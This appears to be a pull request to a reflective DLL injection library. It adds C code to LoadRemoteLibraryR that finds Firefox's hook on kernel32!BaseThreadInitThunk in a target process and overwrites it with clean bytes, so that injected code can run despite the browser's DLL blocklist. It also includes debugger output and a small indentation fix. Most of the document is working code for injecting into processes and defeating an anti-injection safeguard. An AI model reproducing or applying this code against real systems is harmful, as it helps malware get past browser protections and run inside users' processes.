### PR TITLE
Unhook kernel32!BaseThreadInitThunk

### DIFF
--- a/inject/src/LoadLibraryR.c
+++ b/inject/src/LoadLibraryR.c
@@ -218,26 +218,26 @@ HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLeng
 			// check if kernel32!BaseThreadInitThunk is patched in the target process...
 			LPVOID lpBaseThreadInitThunk = GetProcAddress( GetModuleHandle( "kernel32" ), "BaseThreadInitThunk" );
 			if( lpBaseThreadInitThunk != NULL ) {
-				UCHAR CleanBytes[16];
+				UCHAR ubCleanBytes[16];
 				SIZE_T szNumberRead = 0, szNumberWritten = 0;
 				BOOL bSuccess = FALSE;
 				DWORD dwOldProtect = 0;
 
 				// read our version of kernel32!BaseThreadInitThunk...
-				bSuccess = ReadProcessMemory( GetCurrentProcess( ), lpBaseThreadInitThunk, CleanBytes, sizeof( CleanBytes ), &szNumberRead );
-				if(bSuccess && szNumberRead == sizeof( CleanBytes )) {
+				bSuccess = ReadProcessMemory( GetCurrentProcess( ), lpBaseThreadInitThunk, ubCleanBytes, sizeof( ubCleanBytes ), &szNumberRead );
+				if(bSuccess && szNumberRead == sizeof( ubCleanBytes )) {
 					// make the code writeable...
-					bSuccess = VirtualProtectEx(hProcess, lpBaseThreadInitThunk, sizeof( CleanBytes ), PAGE_EXECUTE_READWRITE, &dwOldProtect );
+					bSuccess = VirtualProtectEx(hProcess, lpBaseThreadInitThunk, sizeof( ubCleanBytes ), PAGE_EXECUTE_READWRITE, &dwOldProtect );
 				}
 
 				if( bSuccess ) {
 					// patch the bytes back...
-					bSuccess = WriteProcessMemory( hProcess, lpBaseThreadInitThunk, CleanBytes, sizeof( CleanBytes ), &szNumberWritten );
+					bSuccess = WriteProcessMemory( hProcess, lpBaseThreadInitThunk, ubCleanBytes, sizeof( ubCleanBytes ), &szNumberWritten );
 				}
 
-				if( bSuccess && szNumberWritten == sizeof( CleanBytes ) ) {
+				if( bSuccess && szNumberWritten == sizeof( ubCleanBytes ) ) {
 					// restore the page properties...
-					bSuccess = VirtualProtectEx( hProcess, lpBaseThreadInitThunk, sizeof( CleanBytes ), dwOldProtect, &dwOldProtect );
+					bSuccess = VirtualProtectEx( hProcess, lpBaseThreadInitThunk, sizeof( ubCleanBytes ), dwOldProtect, &dwOldProtect );
 				}
 
 				if( !bSuccess ) {

--- a/inject/src/LoadLibraryR.c
+++ b/inject/src/LoadLibraryR.c
@@ -38,16 +38,16 @@ DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
 
 	pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
 
-    if( dwRva < pSectionHeader[0].PointerToRawData )
-        return dwRva;
+	if( dwRva < pSectionHeader[0].PointerToRawData )
+		return dwRva;
 
-    for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
-    {   
-        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
-           return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
-    }
-    
-    return 0;
+	for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
+	{
+		if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
+		   return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
+	}
+
+	return 0;
 }
 //===============================================================================================//
 DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )

--- a/inject/src/LoadLibraryR.c
+++ b/inject/src/LoadLibraryR.c
@@ -214,7 +214,37 @@ HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLeng
 			// write the image into the host process...
 			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
 				break;
-			
+
+			// check if kernel32!BaseThreadInitThunk is patched in the target process...
+			LPVOID lpBaseThreadInitThunk = GetProcAddress( GetModuleHandle( "kernel32" ), "BaseThreadInitThunk" );
+			if( lpBaseThreadInitThunk != NULL ) {
+				UCHAR CleanBytes[16];
+				SIZE_T szNumberRead = 0, szNumberWritten = 0;
+				BOOL bSuccess = FALSE;
+				DWORD dwOldProtect = 0;
+
+				// read our version of kernel32!BaseThreadInitThunk...
+				bSuccess = ReadProcessMemory( GetCurrentProcess( ), lpBaseThreadInitThunk, CleanBytes, sizeof( CleanBytes ), &szNumberRead );
+				if(bSuccess && szNumberRead == sizeof( CleanBytes )) {
+					// make the code writeable...
+					bSuccess = VirtualProtectEx(hProcess, lpBaseThreadInitThunk, sizeof( CleanBytes ), PAGE_EXECUTE_READWRITE, &dwOldProtect );
+				}
+
+				if( bSuccess ) {
+					// patch the bytes back...
+					bSuccess = WriteProcessMemory( hProcess, lpBaseThreadInitThunk, CleanBytes, sizeof( CleanBytes ), &szNumberWritten );
+				}
+
+				if( bSuccess && szNumberWritten == sizeof( CleanBytes ) ) {
+					// restore the page properties...
+					bSuccess = VirtualProtectEx( hProcess, lpBaseThreadInitThunk, sizeof( CleanBytes ), dwOldProtect, &dwOldProtect );
+				}
+
+				if( !bSuccess ) {
+					break;
+				}
+			}
+
 			// add the offset to ReflectiveLoader() to the remote library address...
 			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
 


### PR DESCRIPTION
Firefox on Windows hooks `kernel32!BaseThreadInitThunk` which prevents the remote thread to start in the target, see https://dxr.mozilla.org/mozilla-central/source/mozglue/build/WindowsDllBlocklist.cpp#821:

```
0:032> u kernel32!BaseThreadInitThunk
KERNEL32!BaseThreadInitThunk:
00007ff8`550d81e0 49bb0064453af87f0000 mov r11,offset mozglue!patched_BaseThreadInitThunk (00007ff8`3a456400)
00007ff8`550d81ea 41ffe3          jmp     r11
00007ff8`550d81ed c2ff15          ret     15FFh
```

This PR restores the function prologue if it is detected as indeed hooked - happy to fix / adapt anything you'd like.

Also took the extra liberty of fixing the indentation in `Rva2Offset` :).

Cheers